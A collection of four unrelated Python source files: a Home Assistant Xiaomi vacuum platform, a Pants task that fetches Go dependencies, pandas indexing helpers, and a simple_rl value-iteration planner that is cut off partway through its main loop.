SERVICE_STOP_REMOTE_CONTROL: {'method': 'async_remote_control_stop'},
SERVICE_MOVE_REMOTE_CONTROL: {
'method': 'async_remote_control_move',
'schema': SERVICE_SCHEMA_REMOTE_CONTROL},
SERVICE_MOVE_REMOTE_CONTROL_STEP: {
'method': 'async_remote_control_move_step',
'schema': SERVICE_SCHEMA_REMOTE_CONTROL},
}
SUPPORT_XIAOMI = SUPPORT_TURN_ON | SUPPORT_TURN_OFF | SUPPORT_PAUSE | \
SUPPORT_STOP | SUPPORT_RETURN_HOME | SUPPORT_FAN_SPEED | \
SUPPORT_SEND_COMMAND | SUPPORT_LOCATE | \
SUPPORT_STATUS | SUPPORT_BATTERY | SUPPORT_CLEAN_SPOT
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
"""Set up the Xiaomi vacuum cleaner robot platform."""
from mirobo import Vacuum
if PLATFORM not in hass.data:
hass.data[PLATFORM] = {}
host = config.get(CONF_HOST)
name = config.get(CONF_NAME)
token = config.get(CONF_TOKEN)
# Create handler
_LOGGER.info("Initializing with host %s (token %s...)", host, token[:5])
vacuum = Vacuum(host, token)
mirobo = MiroboVacuum(name, vacuum)
hass.data[PLATFORM][host] = mirobo
async_add_devices([mirobo], update_before_add=True)
@asyncio.coroutine
def async_service_handler(service):
"""Map services to methods on MiroboVacuum."""
method = SERVICE_TO_METHOD.get(service.service)
params = {key: value for key, value in service.data.items()
if key != ATTR_ENTITY_ID}
entity_ids = service.data.get(ATTR_ENTITY_ID)
if entity_ids:
target_vacuums = [vac for vac in hass.data[PLATFORM].values()
if vac.entity_id in entity_ids]
else:
target_vacuums = hass.data[PLATFORM].values()
update_tasks = []
for vacuum in target_vacuums:
yield from getattr(vacuum, method['method'])(**params)
for vacuum in target_vacuums:
update_coro = vacuum.async_update_ha_state(True)
update_tasks.append(update_coro)
if update_tasks:
yield from asyncio.wait(update_tasks, loop=hass.loop)
descriptions = yield from hass.async_add_job(
load_yaml_config_file, os.path.join(
os.path.dirname(__file__), 'services.yaml'))
for vacuum_service in SERVICE_TO_METHOD:
schema = SERVICE_TO_METHOD[vacuum_service].get(
'schema', VACUUM_SERVICE_SCHEMA)
hass.services.async_register(
DOMAIN, vacuum_service, async_service_handler,
description=descriptions.get(vacuum_service), schema=schema)
class MiroboVacuum(VacuumDevice):
"""Representation of a Xiaomi Vacuum cleaner robot."""
def __init__(self, name, vacuum):
"""Initialize the Xiaomi vacuum cleaner robot handler."""
self._name = name
self._icon = ICON
self._vacuum = vacuum
self.vacuum_state = None
self._is_on = False
self._available = False
self.consumable_state = None
self.clean_history = None
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def icon(self):
"""Return the icon to use for device."""
return self._icon
@property
def status(self):
"""Return the status of the vacuum cleaner."""
if self.vacuum_state is not None:
return self.vacuum_state.state
@property
def battery_level(self):
"""Return the battery level of the vacuum cleaner."""
if self.vacuum_state is not None:
return self.vacuum_state.battery
@property
def fan_speed(self):
"""Return the fan speed of the vacuum cleaner."""
if self.vacuum_state is not None:
speed = self.vacuum_state.fanspeed
if speed in FAN_SPEEDS.values():
return [key for key, value in FAN_SPEEDS.items()
if value == speed][0]
return speed
@property
def fan_speed_list(self):
"""Get the list of available fan speed steps of the vacuum cleaner."""
return list(sorted(FAN_SPEEDS.keys(), key=lambda s: FAN_SPEEDS[s]))
@property
def device_state_attributes(self):
"""Return the specific state attributes of this vacuum cleaner."""
attrs = {}
if self.vacuum_state is not None:
attrs.update({
ATTR_DO_NOT_DISTURB:
STATE_ON if self.vacuum_state.dnd else STATE_OFF,
# Not working --> 'Cleaning mode':
# STATE_ON if self.vacuum_state.in_cleaning else STATE_OFF,
ATTR_CLEANING_TIME: int(
self.vacuum_state.clean_time.total_seconds()
/ 60),
ATTR_CLEANED_AREA: int(self.vacuum_state.clean_area),
ATTR_CLEANING_COUNT: int(self.clean_history.count),
ATTR_CLEANED_TOTAL_AREA: int(self.clean_history.total_area),
ATTR_CLEANING_TOTAL_TIME: int(
self.clean_history.total_duration.total_seconds()
/ 60),
ATTR_MAIN_BRUSH_LEFT: int(
self.consumable_state.main_brush_left.total_seconds()
/ 3600),
ATTR_SIDE_BRUSH_LEFT: int(
self.consumable_state.side_brush_left.total_seconds()
/ 3600),
ATTR_FILTER_LEFT: int(
self.consumable_state.filter_left.total_seconds()
/ 3600)})
if self.vacuum_state.got_error:
attrs[ATTR_ERROR] = self.vacuum_state.error
return attrs
@property
def is_on(self) -> bool:
"""Return True if entity is on."""
return self._is_on
@property
def available(self) -> bool:
"""Return True if entity is available."""
return self._available
@property
def supported_features(self):
"""Flag vacuum cleaner robot features that are supported."""
return SUPPORT_XIAOMI
@asyncio.coroutine
def _try_command(self, mask_error, func, *args, **kwargs):
"""Call a vacuum command handling error messages."""
from mirobo import DeviceException, VacuumException
try:
yield from self.hass.async_add_job(partial(func, *args, **kwargs))
return True
except (DeviceException, VacuumException) as exc:
_LOGGER.error(mask_error, exc)
return False
@asyncio.coroutine
def async_turn_on(self, **kwargs):
"""Turn the vacuum on."""
is_on = yield from self._try_command(
"Unable to start the vacuum: %s", self._vacuum.start)
self._is_on = is_on
@asyncio.coroutine
def async_turn_off(self, **kwargs):
"""Turn the vacuum off and return to home."""
yield from self.async_stop()
yield from self.async_return_to_base()
@asyncio.coroutine
def async_stop(self, **kwargs):
"""Stop the vacuum cleaner."""
stopped = yield from self._try_command(
"Unable to stop: %s", self._vacuum.stop)
if stopped:
self._is_on = False
@asyncio.coroutine
def async_set_fan_speed(self, fan_speed, **kwargs):
"""Set fan speed."""
if fan_speed.capitalize() in FAN_SPEEDS:
fan_speed = FAN_SPEEDS[fan_speed.capitalize()]
else:
try:
fan_speed = int(fan_speed)
except ValueError as exc:
_LOGGER.error("Fan speed step not recognized (%s). "
"Valid speeds are: %s", exc,
self.fan_speed_list)
return
yield from self._try_command(
"Unable to set fan speed: %s",
self._vacuum.set_fan_speed, fan_speed)
@asyncio.coroutine
def async_start_pause(self, **kwargs):
"""Start, pause or resume the cleaning task."""
if self.vacuum_state and self.is_on:
yield from self._try_command(
"Unable to set start/pause: %s", self._vacuum.pause)
else:
yield from self.async_turn_on()
@asyncio.coroutine
def async_return_to_base(self, **kwargs):
"""Set the vacuum cleaner to return to the dock."""
return_home = yield from self._try_command(
"Unable to return home: %s", self._vacuum.home)
if return_home:
self._is_on = False
@asyncio.coroutine
def async_clean_spot(self, **kwargs):
"""Perform a spot clean-up."""
yield from self._try_command(
"Unable to start the vacuum for a spot clean-up: %s",
self._vacuum.spot)
@asyncio.coroutine
def async_locate(self, **kwargs):
"""Locate the vacuum cleaner."""
yield from self._try_command(
"Unable to locate the botvac: %s", self._vacuum.find)
@asyncio.coroutine
def async_send_command(self, command, params=None, **kwargs):
"""Send raw command."""
yield from self._try_command(
"Unable to send command to the vacuum: %s",
self._vacuum.raw_command, command, params)
@asyncio.coroutine
def async_remote_control_start(self):
"""Start remote control mode."""
yield from self._try_command(
"Unable to start remote control the vacuum: %s",
self._vacuum.manual_start)
@asyncio.coroutine
def async_remote_control_stop(self):
"""Stop remote control mode."""
yield from self._try_command(
"Unable to stop remote control the vacuum: %s",
self._vacuum.manual_stop)
@asyncio.coroutine
def async_remote_control_move(self,
rotation: int=0,
velocity: float=0.3,
duration: int=1500):
"""Move vacuum with remote control mode."""
yield from self._try_command(
"Unable to move with remote control the vacuum: %s",
self._vacuum.manual_control,
velocity=velocity, rotation=rotation, duration=duration)
@asyncio.coroutine
def async_remote_control_move_step(self,
rotation: int=0,
velocity: float=0.2,
duration: int=1500):
"""Move vacuum one step with remote control mode."""
yield from self._try_command(
"Unable to remote control the vacuum: %s",
self._vacuum.manual_control_once,
velocity=velocity, rotation=rotation, duration=duration)
def update(self):
"""Fetch state from the device."""
from mirobo import DeviceException
try:
state = self._vacuum.status()
self.vacuum_state = state
self.consumable_state = self._vacuum.consumable_status()
self.clean_history = self._vacuum.clean_history()
self._is_on = state.is_on
self._available = True
except OSError as exc:
_LOGGER.error("Got OSError while fetching the state: %s", exc)
except DeviceException as exc:
_LOGGER.warning("Got exception while fetching the state: %s", exc)
|
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import json
import os
import shutil
from collections import defaultdict
from pants.base.address import Address
from pants.base.address_lookup_error import AddressLookupError
from pants.base.exceptions import TaskError
from pants.util.contextutil import temporary_dir
from pants.util.dirutil import safe_mkdir, safe_open
from pants.util.memo import memoized_property
from pants.contrib.go.subsystems.fetchers import Fetchers
from pants.contrib.go.targets.go_remote_library import GoRemoteLibrary
from pants.contrib.go.tasks.go_task import GoTask
class GoFetch(GoTask):
"""Fetches third-party Go libraries."""
@classmethod
def global_subsystems(cls):
return super(GoFetch, cls).global_subsystems() + (Fetchers,)
@classmethod
def product_types(cls):
return ['go_remote_lib_src']
@property
def cache_target_dirs(self):
# TODO(John Sirois): See TODO in _transitive_download_remote_libs, re-consider how artifact
# caching works for fetches.
return True
def execute(self):
self.context.products.safe_create_data('go_remote_lib_src', lambda: defaultdict(str))
go_remote_libs = self.context.targets(self.is_remote_lib)
if not go_remote_libs:
return
undeclared_deps = self._transitive_download_remote_libs(set(go_remote_libs))
if undeclared_deps:
self._log_undeclared_deps(undeclared_deps)
raise TaskError('Failed to resolve transitive Go remote dependencies.')
def _log_undeclared_deps(self, undeclared_deps):
for dependee, deps in undeclared_deps.items():
self.context.log.error('{address} has remote dependencies which require local declaration:'
.format(address=dependee.address.reference()))
for dep_import_path, address in deps:
self.context.log.error('\t--> {import_path} (expected go_remote_library declaration '
'at {address})'.format(import_path=dep_import_path,
address=address.reference()))
def _get_fetcher(self, import_path):
return Fetchers.global_instance().get_fetcher(import_path)
def _transitive_download_remote_libs(self, go_remote_libs, all_known_addresses=None):
"""Recursively attempt to resolve / download all remote transitive deps of go_remote_libs.
Returns a dict<GoRemoteLibrary, set<tuple<str, Address>>>, which maps a go remote library to a
set of unresolved remote dependencies, each dependency expressed as a tuple containing the
the import path of the dependency and the expected target address. If all transitive
dependencies were successfully resolved, returns an empty dict.
Downloads as many invalidated transitive dependencies as possible, and returns as many
undeclared dependencies as possible. However, because the dependencies of a remote library
can only be determined _after_ it has been downloaded, a transitive dependency of an undeclared
remote library will never be detected.
Because go_remote_libraries do not declare dependencies (rather, they are inferred), injects
all successfully resolved transitive dependencies into the build graph.
"""
if not go_remote_libs:
return {}
all_known_addresses = all_known_addresses or set()
all_known_addresses.update(lib.address for lib in go_remote_libs)
resolved_remote_libs = set()
undeclared_deps = defaultdict(set)
go_remote_lib_src = self.context.products.get_data('go_remote_lib_src')
with self.invalidated(go_remote_libs) as invalidation_check:
for vt in invalidation_check.all_vts:
go_remote_lib = vt.target
gopath = vt.results_dir
fetcher = self._get_fetcher(go_remote_lib.import_path)
if not vt.valid:
root = fetcher.root(go_remote_lib.import_path)
fetch_dir = os.path.join(self.workdir, 'fetches')
root_dir = os.path.join(fetch_dir, root)
# Only fetch each remote root once.
if not os.path.exists(root_dir):
with temporary_dir() as tmp_fetch_root:
fetcher.fetch(go_remote_lib.import_path, dest=tmp_fetch_root, rev=go_remote_lib.rev)
safe_mkdir(root_dir)
for path in os.listdir(tmp_fetch_root):
shutil.move(os.path.join(tmp_fetch_root, path), os.path.join(root_dir, path))
# TODO(John Sirois): Circle back and get get rid of this symlink tree.
# GoWorkspaceTask will further symlink a single package from the tree below into a
# target's workspace when it could just be linking from the fetch_dir. The only thing
# standing in the way is a determination of what we want to artifact cache. If we don't
# want to cache fetched zips, linking straight from the fetch_dir works simply. Otherwise
# thought needs to be applied to using the artifact cache directly or synthesizing a
# canonical owner target for the fetched files that 'child' targets (subpackages) can
# depend on and share the fetch from.
dest_dir = os.path.join(gopath, 'src', root)
# We may have been `invalidate`d and not `clean-all`ed so we need a new empty symlink
# chroot to avoid collision; thus `clean=True`.
safe_mkdir(dest_dir, clean=True)
for path in os.listdir(root_dir):
os.symlink(os.path.join(root_dir, path), os.path.join(dest_dir, path))
# Map the fetched remote sources.
pkg = go_remote_lib.import_path
go_remote_lib_src[go_remote_lib] = os.path.join(gopath, 'src', pkg)
for remote_import_path in self._get_remote_import_paths(pkg, gopath=gopath):
fetcher = self._get_fetcher(remote_import_path)
remote_root = fetcher.root(remote_import_path)
spec_path = os.path.join(go_remote_lib.target_base, remote_root)
package_path = GoRemoteLibrary.remote_package_path(remote_root, remote_import_path)
target_name = package_path or os.path.basename(remote_root)
address = Address(spec_path, target_name)
if address not in all_known_addresses:
try:
# If we've already resolved a package from this remote root, its ok to define an
# implicit synthetic remote target for all other packages in the same remote root.
implicit_ok = any(spec_path == a.spec_path for a in all_known_addresses)
remote_lib = self._resolve(go_remote_lib, address, package_path, implicit_ok)
resolved_remote_libs.add(remote_lib)
all_known_addresses.add(address)
except self.UndeclaredRemoteLibError as e:
undeclared_deps[go_remote_lib].add((remote_import_path, e.address))
self.context.build_graph.inject_dependency(go_remote_lib.address, address)
# Recurse after the invalidated block, so the libraries we downloaded are now "valid"
# and thus we don't try to download a library twice.
trans_undeclared_deps = self._transitive_download_remote_libs(resolved_remote_libs,
all_known_addresses)
undeclared_deps.update(trans_undeclared_deps)
return undeclared_deps
class UndeclaredRemoteLibError(Exception):
def __init__(self, address):
self.address = address
def _resolve(self, dependent_remote_lib, address, pkg, implict_ok):
"""Resolves the GoRemoteLibrary at `address` defining the given `pkg`.
If `implicit_ok` is True, then a GoRemoteLibrary to own `pkg` is always synthesized; otherwise
the address must already exist in the build graph (a BUILD file must exist on disk that owns
the given `pkg` and declares a `rev` for it).
:param dependent_remote_lib: The remote library that depends on the remote `pkg`.
:type: :class:`pants.contrib.go.targets.go_remote_library.GoRemoteLibrary`
:param address: The address of the remote library that should own `pkg`.
:type: :class:`pants.base.Address`
:param string pkg: The remote package path whose owning target needs to be resolved.
:param bool implict_ok: `False` if the given `address` must be defined in a BUILD file on disk;
otherwise a remote library to own `pkg` will always be created and
returned.
:returns: The resulting resolved remote library after injecting it in the build graph.
:rtype: :class:`pants.contrib.go.targets.go_remote_library.GoRemoteLibrary`
:raises: :class:`GoFetch.UndeclaredRemoteLibError`: If no BUILD file exists for the remote root
`pkg` lives in.
"""
if implict_ok:
self.context.add_new_target(address=address,
target_base=dependent_remote_lib.target_base,
target_type=GoRemoteLibrary,
pkg=pkg)
else:
try:
self.context.build_graph.inject_address_closure(address)
except AddressLookupError:
raise self.UndeclaredRemoteLibError(address)
return self.context.build_graph.get_target(address)
@memoized_property
def go_stdlib(self):
out = self.go_dist.create_go_cmd('list', args=['std']).check_output()
return frozenset(out.strip().split())
@staticmethod
def _is_relative(import_path):
return import_path.startswith('.')
def _get_remote_import_paths(self, pkg, gopath=None):
"""Returns the remote import paths declared by the given Go `pkg`."""
out = self.go_dist.create_go_cmd('list', args=['-json', pkg], gopath=gopath).check_output()
try:
data = json.loads(out)
imports = data.get('Imports', [])
imports.extend(data.get('TestImports', []))
return [imp for imp in imports
if (imp not in self.go_stdlib and
# We assume relative imports are local to the package and skip attempts to
# recursively resolve them.
not self._is_relative(imp))]
except ValueError as e:
save_file = os.path.join(gopath, '.errors', pkg, 'list.json')
with safe_open(save_file, 'w') as fp:
fp.write(out)
self.context.log.error('Problem determining imports for {}, saved json response to {}'
.format(pkg, save_file))
raise TaskError(e)
|
|
"""
Low-dependency indexing utilities.
"""
from __future__ import annotations
from typing import TYPE_CHECKING
import warnings
import numpy as np
from pandas._typing import (
Any,
AnyArrayLike,
ArrayLike,
)
from pandas.core.dtypes.common import (
is_array_like,
is_bool_dtype,
is_extension_array_dtype,
is_integer,
is_integer_dtype,
is_list_like,
)
from pandas.core.dtypes.generic import (
ABCIndex,
ABCSeries,
)
if TYPE_CHECKING:
from pandas.core.frame import DataFrame
from pandas.core.indexes.base import Index
# -----------------------------------------------------------
# Indexer Identification
def is_valid_positional_slice(slc: slice) -> bool:
"""
Check if a slice object can be interpreted as a positional indexer.
Parameters
----------
slc : slice
Returns
-------
bool
Notes
-----
A valid positional slice may also be interpreted as a label-based slice
depending on the index being sliced.
"""
def is_int_or_none(val):
return val is None or is_integer(val)
return (
is_int_or_none(slc.start)
and is_int_or_none(slc.stop)
and is_int_or_none(slc.step)
)
def is_list_like_indexer(key) -> bool:
"""
Check if we have a list-like indexer that is *not* a NamedTuple.
Parameters
----------
key : object
Returns
-------
bool
"""
# allow a list_like, but exclude NamedTuples which can be indexers
return is_list_like(key) and not (isinstance(key, tuple) and type(key) is not tuple)
def is_scalar_indexer(indexer, ndim: int) -> bool:
"""
Return True if we are all scalar indexers.
Parameters
----------
indexer : object
ndim : int
Number of dimensions in the object being indexed.
Returns
-------
bool
"""
if ndim == 1 and is_integer(indexer):
# GH37748: allow indexer to be an integer for Series
return True
if isinstance(indexer, tuple) and len(indexer) == ndim:
return all(
is_integer(x) or (isinstance(x, np.ndarray) and x.ndim == len(x) == 1)
for x in indexer
)
return False
def is_empty_indexer(indexer, arr_value: np.ndarray) -> bool:
"""
Check if we have an empty indexer.
Parameters
----------
indexer : object
arr_value : np.ndarray
Returns
-------
bool
"""
if is_list_like(indexer) and not len(indexer):
return True
if arr_value.ndim == 1:
if not isinstance(indexer, tuple):
indexer = (indexer,)
return any(isinstance(idx, np.ndarray) and len(idx) == 0 for idx in indexer)
return False
# -----------------------------------------------------------
# Indexer Validation
def check_setitem_lengths(indexer, value, values) -> bool:
"""
Validate that value and indexer are the same length.
An special-case is allowed for when the indexer is a boolean array
and the number of true values equals the length of ``value``. In
this case, no exception is raised.
Parameters
----------
indexer : sequence
Key for the setitem.
value : array-like
Value for the setitem.
values : array-like
Values being set into.
Returns
-------
bool
Whether this is an empty listlike setting which is a no-op.
Raises
------
ValueError
When the indexer is an ndarray or list and the lengths don't match.
"""
no_op = False
if isinstance(indexer, (np.ndarray, list)):
# We can ignore other listlikes because they are either
# a) not necessarily 1-D indexers, e.g. tuple
# b) boolean indexers e.g. BoolArray
if is_list_like(value):
if len(indexer) != len(value) and values.ndim == 1:
# boolean with truth values == len of the value is ok too
if isinstance(indexer, list):
indexer = np.array(indexer)
if not (
isinstance(indexer, np.ndarray)
and indexer.dtype == np.bool_
and len(indexer[indexer]) == len(value)
):
raise ValueError(
"cannot set using a list-like indexer "
"with a different length than the value"
)
if not len(indexer):
no_op = True
elif isinstance(indexer, slice):
if is_list_like(value):
if len(value) != length_of_indexer(indexer, values) and values.ndim == 1:
# In case of two dimensional value is used row-wise and broadcasted
raise ValueError(
"cannot set using a slice indexer with a "
"different length than the value"
)
if not len(value):
no_op = True
return no_op
def validate_indices(indices: np.ndarray, n: int) -> None:
"""
Perform bounds-checking for an indexer.
-1 is allowed for indicating missing values.
Parameters
----------
indices : ndarray
n : int
Length of the array being indexed.
Raises
------
ValueError
Examples
--------
>>> validate_indices(np.array([1, 2]), 3) # OK
>>> validate_indices(np.array([1, -2]), 3)
Traceback (most recent call last):
...
ValueError: negative dimensions are not allowed
>>> validate_indices(np.array([1, 2, 3]), 3)
Traceback (most recent call last):
...
IndexError: indices are out-of-bounds
>>> validate_indices(np.array([-1, -1]), 0) # OK
>>> validate_indices(np.array([0, 1]), 0)
Traceback (most recent call last):
...
IndexError: indices are out-of-bounds
"""
if len(indices):
min_idx = indices.min()
if min_idx < -1:
msg = f"'indices' contains values less than allowed ({min_idx} < -1)"
raise ValueError(msg)
max_idx = indices.max()
if max_idx >= n:
raise IndexError("indices are out-of-bounds")
# -----------------------------------------------------------
# Indexer Conversion
def maybe_convert_indices(indices, n: int, verify: bool = True):
"""
Attempt to convert indices into valid, positive indices.
If we have negative indices, translate to positive here.
If we have indices that are out-of-bounds, raise an IndexError.
Parameters
----------
indices : array-like
Array of indices that we are to convert.
n : int
Number of elements in the array that we are indexing.
verify : bool, default True
Check that all entries are between 0 and n - 1, inclusive.
Returns
-------
array-like
An array-like of positive indices that correspond to the ones
that were passed in initially to this function.
Raises
------
IndexError
One of the converted indices either exceeded the number of,
elements (specified by `n`), or was still negative.
"""
if isinstance(indices, list):
indices = np.array(indices)
if len(indices) == 0:
# If `indices` is empty, np.array will return a float,
# and will cause indexing errors.
return np.empty(0, dtype=np.intp)
mask = indices < 0
if mask.any():
indices = indices.copy()
indices[mask] += n
if verify:
mask = (indices >= n) | (indices < 0)
if mask.any():
raise IndexError("indices are out-of-bounds")
return indices
# -----------------------------------------------------------
# Unsorted
def is_exact_shape_match(target: ArrayLike, value: ArrayLike) -> bool:
"""
Is setting this value into this target overwriting the entire column?
Parameters
----------
target : np.ndarray or ExtensionArray
value : np.ndarray or ExtensionArray
Returns
-------
bool
"""
return (
len(value.shape) > 0
and len(target.shape) > 0
and value.shape[0] == target.shape[0]
and value.size == target.size
)
def length_of_indexer(indexer, target=None) -> int:
"""
Return the expected length of target[indexer]
Returns
-------
int
"""
if target is not None and isinstance(indexer, slice):
target_len = len(target)
start = indexer.start
stop = indexer.stop
step = indexer.step
if start is None:
start = 0
elif start < 0:
start += target_len
if stop is None or stop > target_len:
stop = target_len
elif stop < 0:
stop += target_len
if step is None:
step = 1
elif step < 0:
start, stop = stop + 1, start + 1
step = -step
return (stop - start + step - 1) // step
elif isinstance(indexer, (ABCSeries, ABCIndex, np.ndarray, list)):
if isinstance(indexer, list):
indexer = np.array(indexer)
if indexer.dtype == bool:
# GH#25774
return indexer.sum()
return len(indexer)
elif isinstance(indexer, range):
return (indexer.stop - indexer.start) // indexer.step
elif not is_list_like_indexer(indexer):
return 1
raise AssertionError("cannot find the length of the indexer")
def deprecate_ndim_indexing(result, stacklevel: int = 3):
"""
Helper function to raise the deprecation warning for multi-dimensional
indexing on 1D Series/Index.
GH#27125 indexer like idx[:, None] expands dim, but we cannot do that
and keep an index, so we currently return ndarray, which is deprecated
(Deprecation GH#30588).
"""
if np.ndim(result) > 1:
warnings.warn(
"Support for multi-dimensional indexing (e.g. `obj[:, None]`) "
"is deprecated and will be removed in a future "
"version. Convert to a numpy array before indexing instead.",
FutureWarning,
stacklevel=stacklevel,
)
def unpack_1tuple(tup):
"""
If we have a length-1 tuple/list that contains a slice, unpack to just
the slice.
Notes
-----
The list case is deprecated.
"""
if len(tup) == 1 and isinstance(tup[0], slice):
# if we don't have a MultiIndex, we may still be able to handle
# a 1-tuple. see test_1tuple_without_multiindex
if isinstance(tup, list):
# GH#31299
warnings.warn(
"Indexing with a single-item list containing a "
"slice is deprecated and will raise in a future "
"version. Pass a tuple instead.",
FutureWarning,
stacklevel=3,
)
return tup[0]
return tup
def check_key_length(columns: Index, key, value: DataFrame):
"""
Checks if a key used as indexer has the same length as the columns it is
associated with.
Parameters
----------
columns : Index The columns of the DataFrame to index.
key : A list-like of keys to index with.
value : DataFrame The value to set for the keys.
Raises
------
ValueError: If the length of key is not equal to the number of columns in value
or if the number of columns referenced by key is not equal to number
of columns.
"""
if columns.is_unique:
if len(value.columns) != len(key):
raise ValueError("Columns must be same length as key")
else:
# Missing keys in columns are represented as -1
if len(columns.get_indexer_non_unique(key)[0]) != len(value.columns):
raise ValueError("Columns must be same length as key")
# -----------------------------------------------------------
# Public indexer validation
def check_array_indexer(array: AnyArrayLike, indexer: Any) -> Any:
"""
Check if `indexer` is a valid array indexer for `array`.
For a boolean mask, `array` and `indexer` are checked to have the same
length. The dtype is validated, and if it is an integer or boolean
ExtensionArray, it is checked if there are missing values present, and
it is converted to the appropriate numpy array. Other dtypes will raise
an error.
Non-array indexers (integer, slice, Ellipsis, tuples, ..) are passed
through as is.
.. versionadded:: 1.0.0
Parameters
----------
array : array-like
The array that is being indexed (only used for the length).
indexer : array-like or list-like
The array-like that's used to index. List-like input that is not yet
a numpy array or an ExtensionArray is converted to one. Other input
types are passed through as is.
Returns
-------
numpy.ndarray
The validated indexer as a numpy array that can be used to index.
Raises
------
IndexError
When the lengths don't match.
ValueError
When `indexer` cannot be converted to a numpy ndarray to index
(e.g. presence of missing values).
See Also
--------
api.types.is_bool_dtype : Check if `key` is of boolean dtype.
Examples
--------
When checking a boolean mask, a boolean ndarray is returned when the
arguments are all valid.
>>> mask = pd.array([True, False])
>>> arr = pd.array([1, 2])
>>> pd.api.indexers.check_array_indexer(arr, mask)
array([ True, False])
An IndexError is raised when the lengths don't match.
>>> mask = pd.array([True, False, True])
>>> pd.api.indexers.check_array_indexer(arr, mask)
Traceback (most recent call last):
...
IndexError: Boolean index has wrong length: 3 instead of 2.
NA values in a boolean array are treated as False.
>>> mask = pd.array([True, pd.NA])
>>> pd.api.indexers.check_array_indexer(arr, mask)
array([ True, False])
A numpy boolean mask will get passed through (if the length is correct):
>>> mask = np.array([True, False])
>>> pd.api.indexers.check_array_indexer(arr, mask)
array([ True, False])
Similarly for integer indexers, an integer ndarray is returned when it is
a valid indexer, otherwise an error is (for integer indexers, a matching
length is not required):
>>> indexer = pd.array([0, 2], dtype="Int64")
>>> arr = pd.array([1, 2, 3])
>>> pd.api.indexers.check_array_indexer(arr, indexer)
array([0, 2])
>>> indexer = pd.array([0, pd.NA], dtype="Int64")
>>> pd.api.indexers.check_array_indexer(arr, indexer)
Traceback (most recent call last):
...
ValueError: Cannot index with an integer indexer containing NA values
For non-integer/boolean dtypes, an appropriate error is raised:
>>> indexer = np.array([0., 2.], dtype="float64")
>>> pd.api.indexers.check_array_indexer(arr, indexer)
Traceback (most recent call last):
...
IndexError: arrays used as indices must be of integer or boolean type
"""
from pandas.core.construction import array as pd_array
# whatever is not an array-like is returned as-is (possible valid array
# indexers that are not array-like: integer, slice, Ellipsis, None)
# In this context, tuples are not considered as array-like, as they have
# a specific meaning in indexing (multi-dimensional indexing)
if is_list_like(indexer):
if isinstance(indexer, tuple):
return indexer
else:
return indexer
# convert list-likes to array
if not is_array_like(indexer):
indexer = pd_array(indexer)
if len(indexer) == 0:
# empty list is converted to float array by pd.array
indexer = np.array([], dtype=np.intp)
dtype = indexer.dtype
if is_bool_dtype(dtype):
if is_extension_array_dtype(dtype):
indexer = indexer.to_numpy(dtype=bool, na_value=False)
else:
indexer = np.asarray(indexer, dtype=bool)
# GH26658
if len(indexer) != len(array):
raise IndexError(
f"Boolean index has wrong length: "
f"{len(indexer)} instead of {len(array)}"
)
elif is_integer_dtype(dtype):
try:
indexer = np.asarray(indexer, dtype=np.intp)
except ValueError as err:
raise ValueError(
"Cannot index with an integer indexer containing NA values"
) from err
else:
raise IndexError("arrays used as indices must be of integer or boolean type")
return indexer
|
|
# Python imports.
from __future__ import print_function
from collections import defaultdict
import random
import copy
# Check python version for queue module.
import sys
if sys.version_info[0] < 3:
import Queue as queue
else:
import queue
# Other imports.
from simple_rl.planning.PlannerClass import Planner
class ValueIteration(Planner):
def __init__(self, mdp, name="value_iter", delta=0.0001, max_iterations=500, sample_rate=3):
'''
Args:
mdp (MDP)
delta (float): After an iteration if VI, if no change more than @\delta has occurred, terminates.
max_iterations (int): Hard limit for number of iterations.
sample_rate (int): Determines how many samples from @mdp to take to estimate T(s' | s, a).
horizon (int): Number of steps before terminating.
'''
Planner.__init__(self, mdp, name=name)
self.delta = delta
self.max_iterations = max_iterations
self.sample_rate = sample_rate
self.value_func = defaultdict(float)
self.max_q_act_histories = defaultdict(str)
self.reachability_done = False
self.has_computed_matrix = False
self.bellman_backups = 0
self.trans_dict = defaultdict(lambda:defaultdict(lambda:defaultdict(float)))
def _compute_matrix_from_trans_func(self):
if self.has_computed_matrix:
self._compute_reachable_state_space()
# We've already run this, just return.
return
# K: state
# K: a
# K: s_prime
# V: prob
for s in self.get_states():
for a in self.actions:
for sample in range(self.sample_rate):
s_prime = self.transition_func(s, a)
self.trans_dict[s][a][s_prime] += 1.0 / self.sample_rate
self.has_computed_matrix = True
def get_gamma(self):
return self.mdp.get_gamma()
def get_num_states(self):
if not self.reachability_done:
self._compute_reachable_state_space()
return len(self.states)
def get_states(self):
if self.reachability_done:
return list(self.states)
else:
self._compute_reachable_state_space()
return list(self.states)
def get_value(self, s):
'''
Args:
s (State)
Returns:
(float)
'''
return self._compute_max_qval_action_pair(s)[0]
def get_q_value(self, s, a):
'''
Args:
s (State)
a (str): action
Returns:
(float): The Q estimate given the current value function @self.value_func.
'''
# Compute expected value.
expected_future_val = 0
for s_prime in self.trans_dict[s][a].keys():
if not s.is_terminal():
expected_future_val += self.trans_dict[s][a][s_prime] * self.reward_func(s, a, s_prime) + \
self.gamma * self.trans_dict[s][a][s_prime] * self.value_func[s_prime]
return expected_future_val
def _compute_reachable_state_space(self):
'''
Summary:
Starting with @self.start_state, determines all reachable states
and stores them in self.states.
'''
if self.reachability_done:
return
state_queue = queue.Queue()
state_queue.put(self.init_state)
self.states.add(self.init_state)
while not state_queue.empty():
s = state_queue.get()
for a in self.actions:
for samples in range(self.sample_rate): # Take @sample_rate samples to estimate E[V]
next_state = self.transition_func(s,a)
if next_state not in self.states:
self.states.add(next_state)
state_queue.put(next_state)
self.reachability_done = True
def run_vi(self):
'''
Returns:
(tuple):
1. (int): num iterations taken.
2. (float): value.
Summary:
Runs ValueIteration and fills in the self.value_func.
'''
# Algorithm bookkeeping params.
iterations = 0
max_diff = float("inf")
self._compute_matrix_from_trans_func()
state_space = self.get_states()
self.bellman_backups = 0
# Main loop.
while max_diff > self.delta and iterations < self.max_iterations:
max_diff = 0
for s in state_space:
self.bellman_backups += 1
if s.is_terminal():
# terminal_reward = self.reward_func(s, self.actions[0])
# print("s: {}\t terminal_reward: {}".format(s, terminal_reward))
# self.value_func[s] = terminal_reward
# self.value_func[s] = max_q
continue
max_q = float("-inf")
for a in self.actions:
q_s_a = self.get_q_value(s, a)
max_q = q_s_a if q_s_a > max_q else max_q
# Check terminating condition.
